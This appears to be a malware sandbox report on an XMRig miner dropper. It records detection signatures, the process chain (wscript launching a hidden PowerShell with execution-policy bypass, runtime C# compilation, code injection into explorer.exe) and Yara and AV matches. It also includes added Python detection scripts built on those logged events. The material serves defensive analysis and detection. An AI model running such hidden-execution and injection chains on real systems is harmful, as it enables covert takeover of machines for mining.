
Windows Analysis Report
SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
Analysis ID: 1543709
MD5: 58819721cbc16ea7033be23e69bd2058
SHA1: 77659fce36b96a2b0de0f7079e057fd711900887
SHA256: ff7d03accac70da489c7f108fa7d7d5fb58e02bcc32f4933ed418451663cc74a
Tags: exe

Detection

Xmrig
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 6620 cmdline: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 1476 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 3364 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC35E.tmp" "c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • wscript.exe (PID: 5940 cmdline: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 1628 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 1576 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDA71.tmp" "c:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Yara matches in memory dumps (Source; Rule; Description; Author; Strings column empty):
0000000B.00000002.3351232614.0000000010E18000.00000004.00000001.00020000.00000000.sdmp; JoeSecurity_Xmrig; Yara detected Xmrig cryptocurrency miner; Joe Security
0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp; JoeSecurity_Xmrig; Yara detected Xmrig cryptocurrency miner; Joe Security
0000000B.00000002.3355532590.000000002ACB0000.00000004.10000000.00040000.00000000.sdmp; JoeSecurity_Xmrig; Yara detected Xmrig cryptocurrency miner; Joe Security
0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp; JoeSecurity_Xmrig; Yara detected Xmrig cryptocurrency miner; Joe Security
0000000B.00000002.3351232614.0000000010D31000.00000004.00000001.00020000.00000000.sdmp; JoeSecurity_Xmrig; Yara detected Xmrig cryptocurrency miner; Joe Security
(6 further entries not shown here)

Yara matches in unpacked PE files (Source; Rule; Description; Author; Strings column empty):
11.2.explorer.exe.29eb093b.8.raw.unpack; JoeSecurity_Xmrig; Yara detected Xmrig cryptocurrency miner; Joe Security
11.2.explorer.exe.1063093b.0.raw.unpack; JoeSecurity_Xmrig; Yara detected Xmrig cryptocurrency miner; Joe Security
11.2.explorer.exe.20d39ac0.2.raw.unpack; JoeSecurity_Xmrig; Yara detected Xmrig cryptocurrency miner; Joe Security
11.0.explorer.exe.1063093b.0.raw.unpack; JoeSecurity_Xmrig; Yara detected Xmrig cryptocurrency miner; Joe Security
11.2.explorer.exe.2acb0000.10.raw.unpack; JoeSecurity_Xmrig; Yara detected Xmrig cryptocurrency miner; Joe Security
(1 further entry not shown here)

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ProcessId: 6620, ProcessName: wscript.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6620, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ProcessId: 5468, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5468, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", ProcessId: 1476, ProcessName: csc.exe
Source: Process started; Author: Michael Haag; Data: Command: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ProcessId: 6620, ProcessName: wscript.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5468, TargetFilename: C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6620, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ProcessId: 5468, ProcessName: powershell.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5468, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", ProcessId: 1476, ProcessName: csc.exe
No Suricata rule has matched
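The Sigma matches above all key on the same handful of process-creation events: wscript.exe launched with app.vbs, the PowerShell child started with -ExecutionPolicy Bypass, and csc.exe compiling a response file out of AppData\Local\Temp with PowerShell as its parent. The Python below is an added example, not part of the Joe Sandbox report and not the Sigma rules' own logic: it re-implements those checks over the process events copied from the process tree above (the wscript parent PID 1068 is taken from the Sigma match data) and adds one constructed benign csc.exe launch from MSBuild to show that the compiler rule does not fire on an ordinary build. The rule names, the set of parents treated as suspicious for csc.exe, and the benign events are my choices, not anything the report states.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """A process-creation record (the fields Sysmon event 1 / Security 4688 provide)."""
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return ntpath.basename(self.image).lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Parents that have no business driving the C# compiler. A chosen set (assumption), not exhaustive.
SUSPICIOUS_CSC_PARENTS = SCRIPT_HOSTS | POWERSHELL | {"mshta.exe", "rundll32.exe", "regsvr32.exe"}

SCRIPT_FILE = re.compile(r'\.(?:vbs|vbe|js|jse|wsf|wsh)(?:"|\s|$)', re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of a parameter name, so -ep, -ex, -exec and
# -ExecutionPolicy all select the execution policy (-e alone is ambiguous with -EncodedCommand).
POLICY_BYPASS = re.compile(r"-(?:ep|ex\w*)\s+(?:bypass|unrestricted)\b", re.IGNORECASE)
# csc.exe reading a .cmdline response file from the per-user Temp folder is the CodeDom
# compile path that the "Dynamic .NET Compilation Via Csc.EXE" match above refers to.
TEMP_RESPONSE_FILE = re.compile(r'@"?[^"\s]*\\AppData\\Local\\Temp\\[^"\s]*\.cmdline', re.IGNORECASE)


def script_host_dropper(ev, parent):
    return ev.name in SCRIPT_HOSTS and SCRIPT_FILE.search(ev.cmdline) is not None


def script_host_spawns_powershell(ev, parent):
    return parent is not None and parent.name in SCRIPT_HOSTS and ev.name in POWERSHELL


def powershell_policy_bypass(ev, parent):
    return ev.name in POWERSHELL and POLICY_BYPASS.search(ev.cmdline) is not None


def csc_compiles_from_temp(ev, parent):
    return (ev.name == "csc.exe"
            and TEMP_RESPONSE_FILE.search(ev.cmdline) is not None
            and parent is not None and parent.name in SUSPICIOUS_CSC_PARENTS)


RULES = {
    "script_host_dropper": script_host_dropper,
    "script_host_spawns_powershell": script_host_spawns_powershell,
    "powershell_policy_bypass": powershell_policy_bypass,
    "csc_compiles_from_temp": csc_compiles_from_temp,
}


def evaluate(events):
    """Return (rule, pid) pairs. Assumes PIDs are unique within the batch (no PID reuse)."""
    by_pid = {e.pid: e for e in events}
    return [(name, ev.pid) for ev in events
            for name, rule in RULES.items() if rule(ev, by_pid.get(ev.ppid))]


def ancestry(events, pid):
    """Image names from the oldest known ancestor down to pid: the execution chain."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return chain[::-1]


# Sample input: the chain from the report's process tree, followed by two constructed
# benign events (an MSBuild-driven compile) that are not from the report.
EVENTS = [
    ProcEvent(6620, 1068, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" '
              r'"C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"'),
    ProcEvent(5468, 6620, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden '
              r'-ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"'),
    ProcEvent(5776, 5468, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(1476, 5468, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"'),
    ProcEvent(3364, 1476, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
              r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '
              r'"/OUT:C:\Users\user\AppData\Local\Temp\RESC35E.tmp" '
              r'"c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP"'),
    # constructed benign events (not from the report): a normal build compiling from obj\
    ProcEvent(4100, 4000, r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
              r"MSBuild.exe MyApp.sln /t:Build"),
    ProcEvent(4200, 4100, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\src\MyApp\obj\Release\MyApp.csproj.rsp"'),
]

if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:32s} pid={pid}  chain={' > '.join(ancestry(EVENTS, pid))}")
```

Run stand-alone it prints four hits, all on the wscript / powershell / csc chain, and nothing for the MSBuild compile; `ancestry()` reproduces the "wscript.exe > powershell.exe > csc.exe" chain that the "Suspicious execution chain found" signature summarises. Note that the execution-policy rule fires on `-ExecutionPolicy Bypass` regardless of parent, which is exactly why that Sigma rule is low severity on its own and gains weight only in combination with the script-host parent.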


AV Detection

Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dll; Avira: detection malicious, Label: TR/Agent.btqep
Source: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dll; ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; ReversingLabs: Detection: 47%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability

Bitcoin Miner

Source: Yara match; File source: 11.2.explorer.exe.29eb093b.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.explorer.exe.1063093b.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.explorer.exe.20d39ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.explorer.exe.1063093b.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.explorer.exe.2acb0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.explorer.exe.297b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.3351232614.0000000010E18000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3355532590.000000002ACB0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3351232614.0000000010D31000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3353996348.0000000029EB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3350741583.0000000010630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
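The Yara hits in this section and in the table near the top are identified only by the dump file names, and those names already carry the information needed to rank them: the fields after the base address are the region's page protection and memory type, so a MEM_PRIVATE region that is PAGE_EXECUTE_READWRITE inside explorer.exe is the injected miner image itself, while a read-write region is more likely a data buffer that merely contains XMRig strings. The Python below is an added example, not code from the report or from Joe Sandbox. The field layout is inferred from the entries on this page (an assumption: it is checked only by the fact that the process index 0xB and snapshot 2 line up with the "11.2.explorer.exe..." unpacked-PE names, and two fields are left undecoded), the protection and type constants are the documented Windows values, and the sample list is copied from the Yara matches above.

```python
import re
from dataclasses import dataclass

# Page protection and region type values as Windows reports them in MEMORY_BASIC_INFORMATION.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Field layout inferred from the names in this report, not taken from Joe Sandbox documentation
# (assumption): <process index>.<snapshot>.<dump id>.<base address>.<protect>.<?>.<type>.<?>.sdmp
# The two fields marked <?> are not decoded.
DUMP_NAME = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<snap>[0-9a-f]{8})\.(?P<dump_id>\d+)\.(?P<base>[0-9a-f]{16})"
    r"\.(?P<protect>[0-9a-f]{8})\.[0-9a-f]{8}\.(?P<mtype>[0-9a-f]{8})\.[0-9a-f]{8}\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Dump:
    name: str
    proc_index: int
    snapshot: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        # mask off modifier bits such as PAGE_GUARD (0x100) before the lookup
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)   # any PAGE_EXECUTE* value

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)   # READWRITE, WRITECOPY and their EXECUTE variants


def parse_dump_name(name: str) -> Dump:
    m = DUMP_NAME.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox memory dump name: {name}")
    return Dump(name, int(m["proc"], 16), int(m["snap"], 16), int(m["base"], 16),
                int(m["protect"], 16), int(m["mtype"], 16))


def rwx_private(dumps):
    """Regions that are MEM_PRIVATE (backed by no file) and both writable and executable:
    the footprint of code written into a process rather than loaded from a PE on disk,
    which is what the thread-injection signatures for explorer.exe describe."""
    return [d for d in dumps if d.mem_type == 0x20000 and d.writable and d.executable]


# Sample input: the ten explorer.exe memory dumps listed as Yara matches above.
SAMPLE = [
    "0000000B.00000002.3351232614.0000000010E18000.00000004.00000001.00020000.00000000.sdmp",
    "0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp",
    "0000000B.00000002.3355532590.000000002ACB0000.00000004.10000000.00040000.00000000.sdmp",
    "0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp",
    "0000000B.00000002.3351232614.0000000010D31000.00000004.00000001.00020000.00000000.sdmp",
    "0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp",
    "0000000B.00000002.3353996348.0000000029EB0000.00000040.00000400.00020000.00000000.sdmp",
    "0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp",
    "0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp",
    "0000000B.00000002.3350741583.0000000010630000.00000040.00000001.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for d in rwx_private(parse_dump_name(n) for n in SAMPLE):
        print(f"snapshot {d.snapshot}: {d.base:#018x} {d.protect_name} {d.type_name}")
```

Of the ten matches only three are RWX private memory: the region at 0x10630000 (present in both snapshot 0 and snapshot 2, and the source of the 11.0/11.2.explorer.exe.1063093b unpacked PEs) and the region at 0x29EB0000. Those are the dumps to pull first for the miner binary and its configuration; the PAGE_READWRITE and MEM_MAPPED hits are secondary.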
Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: vp)[C:\Users\kenba\source\repos\dResult\x64\Release\dResult.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: explorer.exe, explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\kenba\source\repos\dResult\x64\Release\dResult.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
Source: Binary string: C:\Users\kenba\source\repos\dResult\x64\Release\winInfo.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe, 00000000.00000002.2315556372.00007FF8A880A000.00000002.00000001.01000000.00000004.sdmp, winApps.dll.0.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
